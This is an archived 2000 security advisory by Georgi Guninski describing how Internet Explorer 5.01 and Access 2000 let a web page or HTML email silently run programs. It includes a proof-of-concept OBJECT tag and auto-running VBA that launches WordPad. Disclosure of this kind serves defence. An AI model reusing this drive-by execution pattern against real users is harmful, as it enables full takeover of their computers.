exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ie5-access2000.txt

ie5-access2000.txt
Posted Jun 29, 2000
Authored by Georgi Guninski | Site nat.bg

Georgi Guninski security advisory #14 - Internet Explorer 5.01 and Access 2000 allow executing programs when viewing a web page or HTML email message. This allows taking full control over user's computer. Access 2000 allows executing VBA code which has access to system resources and in particular executing files. Includes exploit code which silently opens and executes VBA code from Access 2000. Demonstration available here.

tags | exploit, web
SHA-256 | fe568442ae8f90da9486762f3cbbcbf6148ba69298f95dfc55f9dce550ddbebf

ie5-access2000.txt

Change Mirror Download
Georgi Guninski security advisory #14, 2000

IE 5 and Access 2000 vulnerability - executing programs

Systems affected: IE 5.01, Access 2000, Win98 - probably other versions,
have not tested
Risk: High

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:
Internet Explorer 5.01 and Access 2000 under Windows 98 (suppose other
versions are also vulnerable)
allow executing programs when viewing a web page or HTML email message -
(in the latter case with IFRAME).
This allows taking full control over user's computer.

Details:

Access 2000 allows executing VBA code which has access to system
resources and in particular executing files.
It is possible to silently open and execute .mdb file from IE with the
code:
<OBJECT data="db3.mdb" id="d1"></OBJECT>
This allows executing VBA code from Access 2000, though it is not
visible to the user.

The code is:
-----------access.html----------------------------
<OBJECT data="db3.mdb" id="d1"></OBJECT>
-----------in Form1 of db3.mdb---------------------
Private Sub Form_Load()
On Error GoTo Err_Command0_Click
Dim stAppName As String
stAppName = "C:\Program Files\Accessories\wordpad.exe"
MsgBox ("Trying to start: " & stAppName)
Call Shell(stAppName, 1)

Exit_Command0_Click:
Exit Sub

Err_Command0_Click:
MsgBox Err.Description
Resume Exit_Command0_Click
End Sub
---------------------------------------------------
Form1 is automatically opened at database startup.

Demonstration is available at:
http://www.nat.bg/~joro/access.html


Copyright 2000 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close